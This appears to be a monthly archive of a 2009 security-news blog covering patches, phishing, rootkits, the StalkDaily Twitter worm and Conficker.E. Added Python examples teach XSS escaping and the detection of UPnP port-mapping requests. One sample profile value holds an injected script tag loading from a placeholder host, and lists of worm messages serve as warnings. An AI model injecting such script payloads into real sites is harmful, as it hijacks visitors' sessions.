April 2009 - Posts
Office 2007 users will benefit from updating to the new SP2 release for its functional improvements. Keep in mind that the service pack is fairly large (up to 290 MB).
Office 2007 SP2 released
http://www.microsoft.com/downloads/details.aspx?FamilyId=B444BF18-79EA-46C6-8A81-9DB49B4AB6E5&displaylang=en
KB953195 Office 2007 SP2 - product-specific changes described
http://support.microsoft.com/default.aspx/kb/953195
QUOTE: The 2007 Microsoft Office Suite Service Pack 2 (SP2) provides customers with the latest updates to the 2007 Office suite (the products that are affected by this update are listed below). This download includes:
* Previously unreleased fixes that were made specifically for this service pack.
* In addition to general product fixes, this includes improvements in stability, performance, and security.
* All of the Public Updates, Security Updates, Cumulative Updates, and Hotfixes released through February 2009.
Numerous web sites are being registered and many of these will be used for legitimate purposes. However, some sites could be used for future phishing attacks or to seed malware. Please be careful with both email and websites that you might encounter related to this topic.
Extensive Registrations of Swine Flu Websites
(some of these site names could be used in future attacks)
http://isc.sans.org/diary.html?storyid=6280
http://www.f-secure.com/weblog/archives/00001668.html
http://www.f-secure.com/weblog/archives/swineflu_domains.txt
Spam messages on this theme are circulating and should be avoided, as they may contain malicious links.
Swine Flu Spam
http://www.avertlabs.com/research/blog/index.php/2009/04/27/swine-flue-spam/
http://blog.trendmicro.com/swine-flu-outbreak-hits-the-web-through-spam/
QUOTE: Subject Lines:
First US swine flu victims!
US swine flu statistics
Salma Hayek caught swine flu!
Swine flu worldwide!
Swine flu in Hollywood!
Swine flu in USA
Madonna caught swine flu!
During March, research on Ethics was conducted, which resulted in the following three newsletters that circulated to all members of the Blue Ridge CPCU chapter:
CPCU Research Project - Role of Ethics in Insurance
Microsoft has published a study of infection rates by operating system based on recent MSRT cleaning statistics. While MSRT removes only the most prevalent malware families, this study helps confirm that Vista's out-of-the-box settings and architecture provide clear security benefits.
Malware on Vista rare compared with XP
http://blogs.pcmag.com/securitywatch/2009/04/malware_on_vista_rare_accordin.php
Microsoft Security Intelligence Report Volume 6
http://www.microsoft.com/security/portal/sir.aspx
QUOTE: Comparing the latest service packs for each version, the infection rate of Windows Vista SP1 is 60.6 percent less than that of Windows XP SP3.
Adobe's Acrobat Reader is the world's most established PDF reader. Its popularity has made it a target, and malicious authors have been active in creating exploits for it. At the RSA conference, alternative PDF readers were recommended to reduce PDF risk, as most of the current exploits are written specifically for Adobe's reader.
Because less-targeted software gains some security through obscurity, vulnerabilities in other PDF readers may not have been explored as deeply. Adobe is frequently fixing these security holes, so users who prefer Adobe Reader should stay patched and run the latest version.
All users should avoid unusual PDFs and scan them with up-to-date anti-virus software before opening them. Finally, follow best practices and be careful with any PDF file you receive: if it arrives in an unusual message as an attachment, do not open it.
Article - Ditch Adobe Reader for Better Security
http://tech.yahoo.com/news/pcworld/20090421/tc_pcworld/ditchadobereaderforbettersecurity
QUOTE: The popular Adobe Reader is a favorite target of online crooks, according to Mikko Hypponen, chief research officer with antivirus company F-Secure. And for better security you should ditch Reader and go with a free alternative, he says.
Malware-pushing bad guys increasingly target Adobe Reader flaws, Hypponen says. In 2008, from Jan. 1 through April 16, F-Secure saw PDFs used in 128 dangerous drive-by attacks. This year, during the same time frame, the company has seen 2,305 drive-by's using PDFs. Such attacks go after a vulnerable Reader browser plugin, Hypponen says. Poisoned PDFs are also often used as part of a customized, targeted attack, he says, when they're sent to a specifically selected recipient attached to a well-crafted e-mail.
Hypponen didn't recommend any particular alternative program, but suggested heading to pdfreaders.org for a list of free apps. He did point out that at the time of IE 6's security infamy, many switched over to using Firefox. And as that browser gained significant market share, it also drew the hacker's eye. His hope, he says, is that people use a variety of alternate PDF readers and thereby fly under the bad guys' radar.
The overall goal is "a safer and more trusted Internet" experience. I'm still in a learning mode and below are some key resources discovered so far. The Vision link is a key one for articles and white papers:
Microsoft's End to End trust - Home Page
http://www.microsoft.com/mscorp/twc/endtoendtrust/
Microsoft's End to End trust - Vision
http://www.microsoft.com/mscorp/twc/endtoendtrust/vision.aspx
End to End trust - Community
http://www.microsoft.com/mscorp/twc/endtoendtrust/community.aspx
End to End trust - RSA Conference Addresses
http://www.microsoft.com/mscorp/twc/endtoendtrust/conference.aspx
End to End trust - Security Forums
http://social.microsoft.com/forums/en-US/EndToEndTrust/threads/
Mebroot (StealthMBR) is one of the most advanced rootkits circulating. New variants show even more advanced techniques for hooking into the Windows OS kernel. AV detection has emerged to detect, eradicate, and repair MBR damage. Always use safe practices in handling media, files, and URLs.
Mebroot Rootkit - New Variants more advanced and difficult to detect
http://www.avertlabs.com/research/blog/index.php/2009/04/19/stealthmbr-gets-a-makeover/
http://www.prevx.com/blog/120/MBR-rootkit-changes-itself-and-strikes-again.html
QUOTE: StealthMBR has arguably been dubbed as the stealthiest rootkit ever seen. The new variants are using even ‘deeper’ techniques to evade detection. Broadly speaking, they are hijacking kernel objects (device object) to filter out access to the master boot record and prevent detection and repair.
A total of 43 security patches are available for Oracle's product lines. These should be tested and deployed promptly to keep critical databases and tools secure.
Oracle Critical Patch Update Advisory - April 2009
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html
QUOTE: Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply fixes as soon as possible. This Critical Patch Update contains 43 new security fixes across all products.
The April updates are worth emphasizing this month. Applying them soon, whether through Automatic Updates or manually, will better protect your system. The ISC provides a good summary; they rate three of the bulletins as "patch now" because exploits are circulating in the wild.
MS Patch Tuesday Updates for April 2009
http://isc.sans.org/diary.html?storyid=6193
Microsoft Security Updates - April 2009 Patch Now
https://www.microsoft.com/technet/security/bulletin/ms09-apr.mspx
So far so good in applying these updates to my own systems.
Hospitals that run 24x7 have difficulty finding time to reboot. Still, 700 infected machines is too many given that the patch has been out for 6 months and the level of past awareness. This worm is very stealthy and well written. Based on the account, the university seemed to contain and clean it up fairly well.
Conficker.E Attacks 700 University of Utah PCs
http://www.eweek.com/c/a/Security/Conficker-Attacks-700-University-of-Utah-PCs-835179/
The dreaded Conficker worm made an appearance at the University of Utah heading into the weekend, attacking more than 700 computers and spreading its malware to the university’s three hospitals.
A spokesperson for the university insisted that patient records remain unaffected. According to a report by the Associated Press, campus IT cut off online access for up to 6 hours on April 10, in a bid to isolate Conficker before it could cause further damage.
Conficker was first detected on campus on Thursday, April 9. In addition to infecting hospital computers, Conficker also infiltrated systems in the medical school and the colleges of nursing, pharmacy and health.
Administrators had informed staff and students on the best practices for scrubbing Conficker from computers and auxiliary devices such as smartphones.
Users should exit these programs carefully: press CTRL+SHIFT+ESC to open the Windows Task Manager and end the process there, without clicking any buttons in the rogue's own window. Always avoid purchasing or using this software, as it is not a true security product but one designed to trick people out of money (usually $49).
PAntispyware 09 - New Rogue variant of Antivirus 2009
http://sunbeltblog.blogspot.com/2009/04/new-rogue-p-antispyware-09.html
QUOTE: PAntispyware 09 is yet another rogue from WinSpywareProtect family of rogue security products.
F-Secure reports that the new Twitter worm is designed to spread to as many people as possible and carries no damaging payload. That could change in later attacks, so hopefully these will be stopped. For protection, update AV signatures and avoid any message containing the keyword "Stalkdaily" (and don't visit the website), as noted below.
Ongoing problems at Twitter
http://www.f-secure.com/weblog/archives/00001654.html
Twitter Worm Outbreak during Easter
http://www.f-secure.com/weblog/archives/00001653.html
QUOTE: Twitter administrators don't seem to be able to shut down the various XSS / CSRF worms that have been plaguing the service over the weekend. The actual problems to end users haven't been devastating - so far. Most of the Twitter worms simply modify people's profiles to infect more users. However, attacks like these could be much worse if the attackers would incorporate nastier attacks, such as browser exploits.
Wily Weekend Worms
http://blog.twitter.com/2009/04/wily-weekend-worms.html
QUOTE: On a weekend normally reserved for bunnies, a worm took center stage. A computer worm is a self-replicating computer program sometimes introduced by folks with malicious intent to do some harm to a network. Please note that no passwords, phone numbers, or other sensitive information was compromised as part of these attacks.
McAfee - Twettir Worm (move to DAT 5583)
http://vil.nai.com/vil/content/v_154580.htm
QUOTE: JS/Twettir is the detection for a JavaScript that exploits a cross site scripting vulnerability in Twitter to infect other user profiles. This worm sends messages to all contacts containing any of the following strings:
AVOID THESE MESSAGES
* Dude, www.StalkDaily.com is awesome. What's the fuss?
* Join www.StalkDaily.com everyone!
* Woooo, www.StalkDaily.com :)
* Virus!? What? www.StalkDaily.com is legit!
* Wow...www.StalkDaily.com
* @twitter www.StalkDaily.com
* Twitter has been hacked !!!
* Twitter worm, read here
* StalkDaily worm on Twitter, more info
* HOWTO: Remove StalkDaily.com Auto-Tweets From Your Infected Twitter Profile | Twittercism
* #Stalkdaily virus runs riots on twitter. Learn how to remove it
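The quotes above describe the mechanism behind the worm: a profile field that was rendered into HTML without escaping, so script placed in one profile ran in the browser of every logged-in visitor and posted on their behalf. The following example is added here to illustrate that failure and its fix; it is not code from Twitter, F-Secure or McAfee. The bio string and the script source (example.invalid, a reserved name that never resolves) are constructed for the example, and the two render functions are hypothetical stand-ins for a server-side template.

```python
import html

# Constructed sample of an attacker-controlled profile "bio" value. It both breaks
# out of an attribute and injects a script tag; the src is a placeholder host.
SAMPLE_BIO = 'Hi there" onmouseover="x()"><script src="//example.invalid/w.js"></script>'


def render_profile_unsafe(bio: str) -> str:
    """Vulnerable rendering (hypothetical): the user-supplied value is concatenated
    straight into HTML, in both an attribute context and a text context."""
    return '<div class="bio" title="' + bio + '">' + bio + "</div>"


def render_profile_safe(bio: str) -> str:
    """Hardened rendering: HTML-escape the value before it reaches either context.
    quote=True also escapes quote characters, which closes the attribute break."""
    escaped = html.escape(bio, quote=True)
    return '<div class="bio" title="' + escaped + '">' + escaped + "</div>"


def injects_markup(rendered: str) -> bool:
    """Crude illustrative check: does the rendered output contain a live script tag
    or an attribute boundary that the bio value introduced?"""
    return "<script" in rendered or '" onmouseover=' in rendered


if __name__ == "__main__":
    print("unsafe :", render_profile_unsafe(SAMPLE_BIO))
    print("safe   :", render_profile_safe(SAMPLE_BIO))
    print("unsafe injects markup:", injects_markup(render_profile_unsafe(SAMPLE_BIO)))
    print("safe injects markup  :", injects_markup(render_profile_safe(SAMPLE_BIO)))
```

Output escaping is the mitigation for the stored XSS half of the worm; the CSRF half (the injected script posting updates with the visitor's own session) is what an anti-forgery token on state-changing requests addresses, so both controls are needed.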
The Microsoft Malware Protection Center has developed a comprehensive analysis of "E":
Microsoft Malware Protection Center - Conficker.E
http://blogs.technet.com/mmpc/archive/2009/04/09/win32-conficker-variants-update.aspx
QUOTE: However, deeper analysis shows the following (reminder, we are continuing to research this, but the differences are significant enough that we will be designating this new variant as Conficker.E):
* Exploits MS08-067
* Contains code to spread via network shares
* Drops a driver similar to early variants, using the same mechanisms as Conficker.B.
* Opens a web listener on a pseudo-random port between 1024 and 9999 based on the volume serial number of the system drive.
* Appears to append a stream of randomly generated garbage to itself before offering itself for further propagation. (This will result in untrustworthy file identification information like the ones I use above to inform other researchers as to the specific variant I am talking about; but our community can work its way around that.)
* Contains some of the same IP-filtering used in Conficker.D (Don’t go to certain IP ranges)
* Periodically connects to the following URLs to check for internet connectivity:
* Periodically connects to one of the following sites (at random) to determine its external IP address:
* Deletes itself on and after May 3rd 2009
* Uses SSDP to find Internet gateway devices (i.e. routers) and issues a SOAP command on the device to open an external TCP port and redirect it to an internal IP:port.
* Drops a DLL component that contains P2P functionality
* A very key difference between the .E variant and previous A-D variants. The .E variant executes simultaneous to the existing Conficker.D already on that infected machine.
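One of the behaviours listed above, using SSDP to find the gateway and issuing a SOAP command to open an external port, is observable from the defender's side: on a UPnP Internet Gateway Device the port-forwarding request is the standard WANIPConnection AddPortMapping action, and an ordinary workstation has no business issuing it. The example below is added here, not taken from the Microsoft analysis, and shows detection logic run over a small constructed log. The key=value log format is hypothetical (not a real vendor format), the addresses are from the RFC 5737 documentation range, and ALLOWED_MAPPERS is an assumed allowlist of devices permitted to manage mappings.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed sample of gateway-side HTTP request logs in a hypothetical key=value
# format. The SOAPAction URNs are the standard UPnP IGD WANIPConnection ones.
SAMPLE_LOG = """\
2009-04-10T03:12:44Z src=192.0.2.15 dst=192.0.2.1:2869 method=POST path=/upnp/control/WANIPConn1 soapaction="urn:schemas-upnp-org:service:WANIPConnection:1#GetExternalIPAddress"
2009-04-10T03:12:45Z src=192.0.2.15 dst=192.0.2.1:2869 method=POST path=/upnp/control/WANIPConn1 soapaction="urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
2009-04-10T03:13:02Z src=192.0.2.40 dst=192.0.2.1:2869 method=POST path=/upnp/control/WANIPConn1 soapaction="urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
2009-04-10T03:14:10Z src=192.0.2.77 dst=192.0.2.1:80 method=GET path=/index.html
"""

# Assumption for the example: devices that legitimately manage port mappings
# (e.g. a media server). Everything else requesting a mapping is suspicious.
ALLOWED_MAPPERS: Set[str] = {"192.0.2.40"}

LINE_RE = re.compile(
    r'^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) method=(?P<method>\S+) '
    r'path=(?P<path>\S+)(?: soapaction="(?P<action>[^"]*)")?$'
)


@dataclass
class Finding:
    timestamp: str
    src: str
    action: str


def parse_line(line: str) -> Optional[dict]:
    """Parse one log line of the constructed format; return None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_port_mapping_requests(log_text: str, allowed: Set[str] = ALLOWED_MAPPERS) -> List[Finding]:
    """Flag every SOAP AddPortMapping request whose source is not on the allowlist."""
    findings: List[Finding] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        action = rec["action"] or ""
        if action.endswith("#AddPortMapping") and rec["src"] not in allowed:
            findings.append(Finding(rec["ts"], rec["src"], action))
    return findings


if __name__ == "__main__":
    for f in find_port_mapping_requests(SAMPLE_LOG):
        print(f"{f.timestamp} {f.src} requested {f.action.split('#')[-1]} on the gateway")
```

The same logic applies to any sensor that can see the SOAP control traffic (the gateway's own request log, or a network tap decoding HTTP to the UPnP control port). Where nothing on the network needs UPnP IGD, disabling it on the gateway removes the whole channel and is the simpler mitigation.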
More details have surfaced from F-Secure's blog ...
Conficker.E - Additional information on new Variant
http://www.f-secure.com/weblog/archives/00001652.html
QUOTE: A new variant of Conficker was found yesterday. We're still investigating the files but here's what we know so far.
• On April 8th a new update was made available to Conficker.C infected machines via the P2P network
• The new file, which we call Conficker.E, is executed and co-exists alongside the old infection
• It re-introduces spreading via the MS08-067 vulnerability. Spreading functionality was removed in Conficker.C and the gang behind this maybe realized they made a mistake and added it again.
• There's a possible connection to Waledac, a spambot. Some Conficker.C infected computers connected to a well known Waledac domain and downloaded Waledac from there.
• There's also a connection to rogue anti-virus products as we've seen it end up on Conficker.C infected machines. The rogue product was Spyware Guard 2008.
• Conficker.E deletes itself if the date is May 3, 2009 or later.